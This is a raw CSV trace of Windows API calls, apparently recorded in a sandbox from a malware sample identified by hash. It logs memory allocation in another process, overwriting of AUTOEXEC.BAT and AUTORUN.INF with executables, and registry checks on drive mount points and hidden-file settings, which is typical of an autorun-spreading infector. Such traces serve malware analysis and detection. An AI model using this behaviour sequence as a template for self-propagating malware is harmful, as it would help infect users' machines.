"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->61440"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToRead->47554"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->47554"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToWrite->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bc58","nInBufferSize->0x00000046","lpOutBuffer->0x00486100","nOutBufferSize->0x000000ee","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000118","hKey->0x00000120","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000118","lpValueName->Data"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000118","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->0x00000118","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000120","lpValueName->Generation"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","FAILURE","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x00498e00","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x0049cd30","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\AUTOEXEC.BAT"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\AUTOEXEC.BAT.exe","lpNewFileName->C:\AUTOEXEC.BAT"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\AutoRun.exe","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->268"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000118","lpFileName->C:\8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","dwDesiredAccess->GENERIC_READ"
"20190731003628.253","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x000000e4","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","CreateFileW","SUCCESS","0x00000114","lpFileName->C:\AUTORUN.INF.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","FAILURE","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x00498e00","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","device","DeviceIoControl","SUCCESS","","hDevice->0x00000120","dwIoControlCode->0x006d0034","lpInBuffer->0x0049cb20","nInBufferSize->0x00000208","lpOutBuffer->0x0049cd58","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegCreateKeyExW","SUCCESS","0x00000120","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegSetValueExW","SUCCESS","","hKey->0x00000120","lpValueName->BaseClass","dwType->1","lpData->Drive","cbData->12"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000120","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->0x00000120","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000128","lpValueName->Generation"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x7c9c0000","lpFileName->SHELL32.dll"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000012a","hKey->HKEY_CLASSES_ROOT","lpSubKey->Directory"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000012a","lpSubKey->CurVer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000122","hKey->0x0000012a","lpSubKey->(null)"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x00000128","lpValueName->DontShowSuperHidden"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x00000128","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000012c","hKey->0x00000128","lpSubKey->(null)"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000012c","lpValueName->ShellState"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000012c","lpValueName->ShellState"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x0000012c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x0000012c","lpValueName->ForceActiveDesktopOn"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->61440"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x00000118","nNumberOfBytesToRead->47554"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->47554"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","ReadFile","SUCCESS","","hFile->0x000000e4","nNumberOfBytesToRead->145"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->145"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->268"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","WriteFile","SUCCESS","","hFile->0x00000114","nNumberOfBytesToWrite->268"
"20190731003628.263","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","DeleteFileW","FAILURE","","lpFileName->C:\AUTORUN.INF"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->NoActiveDesktop"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\System"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->NoWebView"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->ClassicShell"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->SeparateProcess"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegOpenKeyExW","SUCCESS","0x000000e4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e4","lpValueName->NoNetCrawling"
"20190731003628.273","420","8720697f1339c3ddfd517695c92d48e7ba8ec70147b6b94645ae4a7a2cd5b144","600","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->C:\AUTORUN.INF.exe","lpNewFileName->C:\AUTORUN.INF"
